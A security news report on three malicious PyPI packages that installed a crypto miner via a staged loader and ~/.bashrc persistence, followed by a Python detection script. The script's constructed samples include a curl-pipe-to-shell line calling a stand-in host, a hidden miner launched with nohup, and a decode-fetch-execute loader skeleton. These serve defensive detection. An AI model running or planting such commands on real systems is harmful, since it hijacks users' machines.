Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices.
The three malicious packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down.
“These packages, upon initial use, deploy a CoinMiner executable on Linux devices,” Fortinet FortiGuard Labs researcher Gabby Xiong said, adding that the campaign shares overlaps with a prior campaign that involved the use of a package called culturestreak to deploy a crypto miner.
The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server: a shell script (“unmi.sh”) that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab.
“Echoing the approach of the earlier ‘culturestreak’ package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL,” Xiong said. “The payload is then incrementally released in various stages to execute its malicious activities.”
The connections to the culturestreak package also stem from the fact that the configuration file is hosted on the domain papiculo[.]net and the coin mining executables are hosted on a public GitLab repository.
One notable improvement in the three new packages is the introduction of an extra stage by concealing their nefarious intent in the shell script, thereby helping it evade detection by security software and extending the exploitation process.
“Moreover, this malware inserts the malicious commands into the ~/.bashrc file,” Xiong said. “This addition ensures the malware’s persistence and reactivation on the user’s device, effectively extending the duration of its covert operation. This strategy aids in the prolonged, stealthy exploitation of the user’s device for the attacker’s benefit.”
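The two behaviours described above, a package __init__.py that decodes and fetches a remote stage at import time and a persistence hook dropped into ~/.bashrc, can both be flagged with simple heuristics. The following is an added detection example, not code from the article or from FortiGuard Labs; the regex patterns, the sample inputs and the example.invalid host are all constructed for illustration.

```python
"""Heuristic detector for the two behaviours the article reports: a package
__init__.py that decodes and fetches a remote stage at import time, and a
persistence hook appended to ~/.bashrc. Patterns and samples are constructed
for illustration and will need tuning before any production use."""
import re

# Signals of import-time download-and-execute staging in package code.
INIT_PATTERNS = {
    "decode": re.compile(r"\b(?:base64\.b64decode|codecs\.decode|bytes\.fromhex)\("),
    "fetch": re.compile(r"\b(?:urllib\.request\.urlopen|requests\.get|urlopen)\("),
    "execute": re.compile(r"\b(?:exec|eval|os\.system|subprocess\.(?:run|Popen|call))\("),
}
# Signals of a persistence hook in a shell rc file (coarse; expect noise).
RC_PATTERNS = {
    "download-and-run": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b"),
    "hidden-or-tmp-binary": re.compile(r"(?:^|\s)(?:/tmp|/var/tmp|/dev/shm|~/\.[\w-]+)/\S+"),
    "background-job": re.compile(r"\bnohup\b.*&\s*$"),
}

def scan_init(source: str) -> list[str]:
    """Return the names of the indicators present in an __init__.py source."""
    return [name for name, rx in INIT_PATTERNS.items() if rx.search(source)]

def is_staged_loader(source: str) -> bool:
    """The decode + fetch + execute triple together is the staging shape."""
    return {"decode", "fetch", "execute"} <= set(scan_init(source))

def scan_rc(text: str) -> list[tuple[int, str]]:
    """Return (line_number, indicator) pairs for suspicious rc-file lines."""
    return [(n, name) for n, line in enumerate(text.splitlines(), 1)
            for name, rx in RC_PATTERNS.items() if rx.search(line)]

# Constructed sample inputs; not the real packages' code or a real domain.
SAMPLE_INIT = (
    "import base64, urllib.request, subprocess\n"
    "u = base64.b64decode(b'...').decode()\n"
    "s = urllib.request.urlopen(u).read()\n"
    "subprocess.run(['sh', '-c', s.decode()])\n"
)
SAMPLE_BASHRC = (
    "export PATH=$HOME/bin:$PATH\n"
    "alias ll='ls -la'\n"
    "curl -s http://example.invalid/unmi.sh | sh\n"
    "nohup ~/.config/.miner -c ~/.config/cfg.json >/dev/null 2>&1 &\n"
)

if __name__ == "__main__":
    print(scan_init(SAMPLE_INIT), is_staged_loader(SAMPLE_INIT))
    print(scan_rc(SAMPLE_BASHRC))
```

Run scan_init over the __init__.py of each package in a fresh virtual environment before importing anything, and scan_rc over rc files on hosts where an affected package was installed.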